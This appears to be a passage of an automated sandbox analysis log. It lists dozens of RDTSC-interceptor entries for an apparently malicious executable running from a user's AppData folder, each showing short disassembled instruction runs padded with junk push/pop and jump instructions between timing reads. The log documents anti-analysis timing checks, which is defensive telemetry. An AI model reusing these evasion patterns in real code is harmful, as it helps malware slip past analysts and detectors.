Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E906 second address: 57E913 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E913 second address: 57E918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E995 second address: 57E99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D061F second address: 5D0623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D0623 second address: 5D0635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F95FD07A056h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D8818 second address: 5D8853 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F95FD7D8996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F95FD7D8996h 0x00000013 jmp 00007F95FD7D89A6h 0x00000018 jmp 00007F95FD7D89A0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D8853 second address: 5D8865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F95FD07A05Ah 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6AEE second address: 5D6B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD7D89A5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F95FD7D8996h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6C7C second address: 5D6C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6C82 second address: 5D6C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F95FD7D899Eh 0x0000000d ja 00007F95FD7D8996h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6C9B second address: 5D6CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6CA1 second address: 5D6CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7284 second address: 5D7290 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95FD07A056h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7290 second address: 5D72AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F95FD7D89A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7559 second address: 5D7567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F95FD07A056h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7567 second address: 5D756B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7FC9 second address: 5D7FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7FD1 second address: 5D7FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBBA second address: 5DDBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBBE second address: 5DDBC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBC2 second address: 5DDBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBC8 second address: 5DDBCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBCD second address: 5DDBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F95FD07A056h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DCC9B second address: 5DCCAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F95FD7D899Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DCDF0 second address: 5DCDFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DCF87 second address: 5DCF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD10A second address: 5DD113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD288 second address: 5DD29F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F95FD7D899Ah 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD40D second address: 5DD446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95FD07A069h 0x0000000a jmp 00007F95FD07A063h 0x0000000f pushad 0x00000010 push edi 0x00000011 jmp 00007F95FD07A066h 0x00000016 pop edi 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD446 second address: 5DD44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD591 second address: 5DD5D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F95FD07A060h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 jp 00007F95FD07A056h 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F95FD07A056h 0x00000021 jmp 00007F95FD07A065h 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD5D2 second address: 5DD5EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD5EA second address: 5DD5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD858 second address: 5DD86A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F95FD7D8996h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E2014 second address: 5E2029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 jo 00007F95FD07A056h 0x0000000f pop edi 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E2029 second address: 5E2054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F95FD7D89A8h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD7D899Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E95FA second address: 5E960E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jp 00007F95FD07A056h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E960E second address: 5E9612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E98D1 second address: 5E98D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E98D7 second address: 5E98E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E98E4 second address: 5E98FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E9B75 second address: 5E9B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007F95FD7D89A9h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E9B93 second address: 5E9BA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jl 00007F95FD07A056h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E9BA2 second address: 5E9BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD7D899Eh 0x00000009 jmp 00007F95FD7D89A3h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F95FD7D8996h 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E9BDC second address: 5E9BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5EA406 second address: 5EA40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5EA40D second address: 5EA414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F2278 second address: 5F2291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F95FD7D899Fh 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F2291 second address: 5F2296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F2296 second address: 5F229B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D3A second address: 5F1D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D3E second address: 5F1D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F95FD7D8996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D51 second address: 5F1D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D57 second address: 5F1D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D5B second address: 5F1D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D61 second address: 5F1D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1FDB second address: 5F1FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 60637A second address: 606380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 606380 second address: 6063AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Ch 0x00000007 jmp 00007F95FD07A069h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6063AE second address: 6063B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6061D0 second address: 6061FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A063h 0x00000007 jmp 00007F95FD07A060h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6061FB second address: 6061FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6061FF second address: 606203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 606203 second address: 606222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F95FD7D8996h 0x00000014 popad 0x00000015 jp 00007F95FD7D899Eh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 606222 second address: 606226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 607A6C second address: 607A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53BBCD second address: 53BBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jo 00007F95FD07A05Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95FD07A060h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53BBF5 second address: 53BBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 60EE59 second address: 60EE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61C7A4 second address: 61C7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F95FD7D8996h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61C7AE second address: 61C7CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A066h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B306 second address: 61B30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B30A second address: 61B30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B30E second address: 61B319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B5C5 second address: 61B5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jno 00007F95FD07A05Eh 0x0000000f jnp 00007F95FD07A058h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F95FD07A056h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B5F0 second address: 61B5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B5F7 second address: 61B611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A066h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B743 second address: 61B749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B749 second address: 61B757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F95FD07A058h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B757 second address: 61B76F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F95FD7D899Ch 0x00000008 jnc 00007F95FD7D8996h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007F95FD7D8996h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61BA79 second address: 61BA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A064h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61BA91 second address: 61BA96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61C4B7 second address: 61C4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6200D8 second address: 62011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD7D89A0h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F95FD7D89A2h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F95FD7D899Dh 0x0000001a jmp 00007F95FD7D899Ah 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 62011D second address: 62012D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 jp 00007F95FD07A05Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 622AFF second address: 622B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6306F2 second address: 6306F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6306F8 second address: 630719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F95FD7D89A7h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 630719 second address: 630721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 640AF7 second address: 640B01 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F95FD7D8996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 64087A second address: 640880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
